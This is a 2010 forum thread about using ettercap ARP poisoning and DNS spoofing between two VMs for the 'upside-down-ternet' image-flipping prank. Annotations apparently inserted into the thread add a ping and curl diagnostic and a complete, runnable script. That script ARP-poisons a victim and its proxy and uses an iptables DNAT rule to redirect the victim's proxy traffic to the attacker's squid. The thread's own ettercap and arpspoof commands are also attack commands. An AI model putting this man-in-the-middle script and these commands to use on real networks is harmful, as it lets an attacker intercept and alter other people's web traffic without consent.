Blue Dragon Posted April 4, 2010

Hi, I've been playing around with ettercap in a VM a little bit. I used

    sudo ettercap -T -q -P dns_spoof -i eth0 -M ARP /192.168.0.134/ //

with 192.168.0.134 being a second VM ("victim"). The etter.dns has nothing but

    * A 192.168.0.150

in it, with 192.168.0.150 being my first VM ("attacker") that is running ettercap. Basically I wanted to test the "upside-down-ternet" prank on my test network. It worked quite well and actually turned the images around like it should do.

However, I've noticed one problem: when you go to a new site on the "victim", this site takes very long to load. It sometimes takes up to a minute for the site to respond, but sure enough, in the end it loads and the images are upside down! The strange thing is that once flickr.com, for example, is loaded, browsing the site is very snappy and all the images load as fast as always, and they're all upside down! So it seems that the initial DNS lookup/ping takes very long, but once a connection is made, everything is as fast as it should be.

I also tried speedtest.net, which gave me 27 Mbit down (normally I only get about 6 Mbit, so I guess it measured the LAN speed) and 0.5 up (normal). Then I tried pingtest.net and it gave me an error saying that it couldn't connect to the server because it timed out.

Then I tried pinging Google from the "victim" while ettercap was running the dns_spoof:

    vadmin@vadmin ~ $ ping google.de
    PING google.de (192.168.0.150) 56(84) bytes of data.
    64 bytes from mint8-2.local (192.168.0.150): icmp_seq=1 ttl=64 time=0.159 ms
    64 bytes from mint8-2.local (192.168.0.150): icmp_seq=2 ttl=64 time=0.202 ms
    64 bytes from mint8-2.local (192.168.0.150): icmp_seq=3 ttl=64 time=0.188 ms
    64 bytes from mint8-2.local (192.168.0.150): icmp_seq=4 ttl=64 time=0.194 ms
    64 bytes from thom-mint8-2.local (192.168.0.150): icmp_seq=5 ttl=64 time=0.196 ms
    ^C
    --- google.de ping statistics ---
    5 packets transmitted, 5 received, 0% packet loss, time 80183ms
    rtt min/avg/max/mdev = 0.159/0.187/0.202/0.022 ms

Notice that it took 80183 ms to finish 5 packets! Without the dns_spoof, it only took 4003 ms! However, each individual packet went over the wire in 0.2 ms (LAN speed) compared to 68 ms.

    vadmin@vadmin ~ $ ping google.de
    PING google.de (216.239.59.104) 56(84) bytes of data.
    64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=1 ttl=48 time=68.5 ms
    64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=2 ttl=48 time=67.3 ms
    64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=3 ttl=48 time=68.3 ms
    64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=4 ttl=48 time=67.8 ms
    64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=5 ttl=48 time=69.0 ms
    ^C
    --- google.de ping statistics ---
    5 packets transmitted, 5 received, 0% packet loss, time 4003ms
    rtt min/avg/max/mdev = 67.385/68.235/69.035/0.613 ms

One other thing: when I set up the victim's browser to use 192.168.0.150:3128 as a proxy and didn't use ettercap at all, everything works perfectly! All the images are upside down and opening a new site is very fast. So there really seems to be something wrong with my DNS spoofing.

I'm running "ettercap NG-0.7.3" on a Linux Mint 8 VM in VMware Player 3.0 with a bridged network card. I have ip_forward activated on my "attacker" box and, as I said, everything works when I let the "victim" surf through 192.168.0.150:3128 as a proxy.

I would really appreciate some help! ;)
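The post above measures the wrong thing: the per-packet RTT is time on the wire, but ping's "time NNNNms" summary is wall clock from first request to last reply, and ping does one reverse DNS lookup for every reply unless run with -n. A check that separates the two, as an added example that is not code from the original post: the two summary blocks embedded below are the ones pasted in the post, the shell functions are mine, and they assume a Linux iputils ping (1 s default interval, the "time NNNNms" summary line) and curl on the victim.

```sh
#!/bin/sh
# Added diagnostic for the thread above; not code from the original post.
# Assumes Linux iputils ping (1 s interval, "time NNNNms" summary) and curl.
set -eu

# From the thread: ping google.de while dns_spoof answered with 192.168.0.150
SPOOFED_SUMMARY='5 packets transmitted, 5 received, 0% packet loss, time 80183ms
rtt min/avg/max/mdev = 0.159/0.187/0.202/0.022 ms'
# From the thread: the same ping without the spoof
NORMAL_SUMMARY='5 packets transmitted, 5 received, 0% packet loss, time 4003ms
rtt min/avg/max/mdev = 67.385/68.235/69.035/0.613 ms'

# ping_overhead: read a ping summary on stdin and print, in whole ms, the
# wall-clock time per probe that is not explained by the send interval plus
# the average RTT. ping's "time" field spans first request to last reply, so
# for N probes it should be roughly (N-1)*interval + rtt; anything on top was
# spent off the wire. ping reverse-resolves every reply address unless run
# with -n, so a spoofed or unreachable resolver shows up here, not in the RTT.
# Optional $1 = interval in ms (default 1000, ping's default).
ping_overhead() {
    awk -v iv="${1:-1000}" '
        /packets transmitted/ { sent = $1; sub(/ms$/, "", $NF); total = $NF }
        /rtt min\/avg\/max/   { split($4, r, "/"); avg = r[2] }
        END {
            if (sent == "" || avg == "") { print "no ping summary found" > "/dev/stderr"; exit 1 }
            over = total - ((sent - 1) * iv + avg)
            if (over < 0) over = 0
            printf "%d\n", over / sent
        }'
}

# ping_compare: run ping with and without reverse lookups and report the
# off-wire overhead of each; a large difference points at name resolution.
ping_compare() {
    echo "with reverse lookups : $(ping -c 5 "$1" | ping_overhead) ms/probe"
    echo "without (-n)         : $(ping -n -c 5 "$1" | ping_overhead) ms/probe"
}

# phase_times: split one page load into DNS, TCP connect and first byte,
# which is exactly the "slow first load, fast afterwards" question.
phase_times() {
    curl -o /dev/null -s \
        -w 'namelookup=%{time_namelookup}s connect=%{time_connect}s firstbyte=%{time_starttransfer}s\n' \
        "$1"
}

case "${1:-}" in
    ping) ping_compare "${2:-google.de}" ;;
    http) phase_times "${2:-http://flickr.com/}" ;;
    demo) printf '%s\n' "$SPOOFED_SUMMARY" | ping_overhead
          printf '%s\n' "$NORMAL_SUMMARY" | ping_overhead ;;
esac
```

Run `sh diag.sh demo` to see the two pasted summaries side by side: the spoofed run carries about 15 s of off-wire time per probe, the normal run none. `sh diag.sh ping google.de` on the victim then tells you whether the delay disappears with `-n`, and `sh diag.sh http http://flickr.com/` shows whether the browser's first-load stall is in `namelookup` or in `connect`.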
Blue Dragon Posted April 8, 2010 (Author)

Anyone? As I said, it all works perfectly when the "victim" connects voluntarily to the proxy at 192.168.0.150:3128.

What if the browser on the "victim" was already set up to use a proxy server, like in this case 192.168.0.12:3128? How can I spoof the network so that the browser connects to 192.168.0.150 instead of 192.168.0.12?

I've tried arpspoof (set it up in two terminals, one for Victim-Gateway (proxy), one for Gateway (proxy)-Victim, as described here: http://su2.info/doc/arpspoof.php), but it didn't work. The "victim" could connect to the internet and the pictures weren't upside down! I've also tried ettercap without the "-P dns" part, as this is what seems to slow things down. Didn't work either, images all right side up.

Do you think that doing this all in a VM could be an issue? I have 2 VMs running on a Core i7 Win7 box, so CPU shouldn't be a problem. Maybe the network card is too slow or something? Wild guess, yeah...
Infiltrator Posted April 10, 2010

Quoting Blue Dragon: Anyone? As I said, it all works perfectly when the "victim" connects voluntarily to the proxy at 192.168.0.150:3128. What if the browser on the "victim" was already set up to use a proxy server, like in this case 192.168.0.12:3128? How can I spoof the network so that the browser connects to 192.168.0.150 instead of 192.168.0.12? I've tried arpspoof (set it up in two terminals, one for Victim-Gateway (proxy), one for Gateway (proxy)-Victim, as described here: http://su2.info/doc/arpspoof.php), but it didn't work. The "victim" could connect to the internet and the pictures weren't upside down! I've also tried ettercap without the "-P dns" part, as this is what seems to slow things down. Didn't work either, images all right side up. Do you think that doing this all in a VM could be an issue? I have 2 VMs running on a Core i7 Win7 box, so CPU shouldn't be a problem. Maybe the network card is too slow or something? Wild guess, yeah...

That one might be a little bit trickier, you have to be sitting in between the client and the proxy server.
Blue Dragon Posted April 10, 2010 (Author)

Thanks for the answer.

Quoting Infiltrator: That one might be a little bit trickier, you have to be sitting in between the client and the proxy server.

Well, I'm on the same network, so all I would have to do is arpspoof both the victim at 192.168.0.134 and the proxy at 192.168.0.12 into believing I was the other one.

    victim:   192.168.0.134 (set up to use proxy 192.168.0.12:3128)
    proxy:    192.168.0.12
    attacker: 192.168.0.150 running squid proxy + upside-down-ternet script

As I said, when I set up the victim to use 192.168.0.150:3128 as proxy, everything works.
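Poisoning both sides, as the post above describes, only makes the attacker a forwarder: with ip_forward on, the victim's packets still carry destination 192.168.0.12:3128 and are routed on to the real proxy untouched, which matches the "images all right side up" result. The attacker also has to rewrite those packets to his own squid before forwarding them. The script below is an added example, not code from the thread; the two arpspoof invocations are the ones the post outlines, the PREROUTING DNAT rule is my addition, and the addresses, interface name `eth0` and the squid port are taken from the post. It assumes Linux with iptables and dsniff's arpspoof installed and that the local squid's `http_access` rules allow connections from 192.168.0.134.

```sh
#!/bin/sh
# Added lab script for the setup in the thread; not code from the original post.
# Assumes Linux, iptables, dsniff's arpspoof, and squid on the attacker's port 3128.
set -eu

VICTIM=192.168.0.134     # browser configured to use proxy 192.168.0.12:3128
PROXY=192.168.0.12       # the real proxy the victim is pointed at
ATTACKER=192.168.0.150   # this box, running squid + the upside-down script
PROXY_PORT=3128
IFACE=eth0
DRY_RUN="${DRY_RUN:-}"   # DRY_RUN=1 prints the commands instead of running them

run() {
    if [ -n "$DRY_RUN" ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Packets from the victim that arrive here (because of the ARP poisoning)
# still have dst 192.168.0.12:3128. Rewrite them to the local squid in the
# nat PREROUTING hook so they are delivered locally instead of forwarded.
# $1 = -A to add the rule, -D to delete it.
nat_rule() {
    run iptables -t nat "$1" PREROUTING -i "$IFACE" -s "$VICTIM" -p tcp \
        -d "$PROXY" --dport "$PROXY_PORT" -j DNAT --to-destination "$ATTACKER:$PROXY_PORT"
}

start() {
    run sysctl -w net.ipv4.ip_forward=1      # keep everything else flowing
    nat_rule -A
    # Poison both directions: victim thinks we are the proxy,
    # proxy thinks we are the victim (same as the two-terminal setup).
    run arpspoof -i "$IFACE" -t "$VICTIM" "$PROXY" &
    run arpspoof -i "$IFACE" -t "$PROXY" "$VICTIM" &
    wait
}

stop() {
    run pkill arpspoof || true   # arpspoof re-ARPs the real MACs on exit
    nat_rule -D
}

case "${1:-}" in
    start) start ;;
    stop)  stop ;;
esac
```

Because the victim's browser already speaks proxy-style HTTP (absolute URIs) to port 3128, the attacker's squid needs no transparent/intercept mode; the DNAT just changes which host the existing proxy session lands on. Run `DRY_RUN=1 sh mitm.sh start` first to review the exact iptables and arpspoof lines, and `sh mitm.sh stop` afterwards so the rule is removed and the ARP caches are restored.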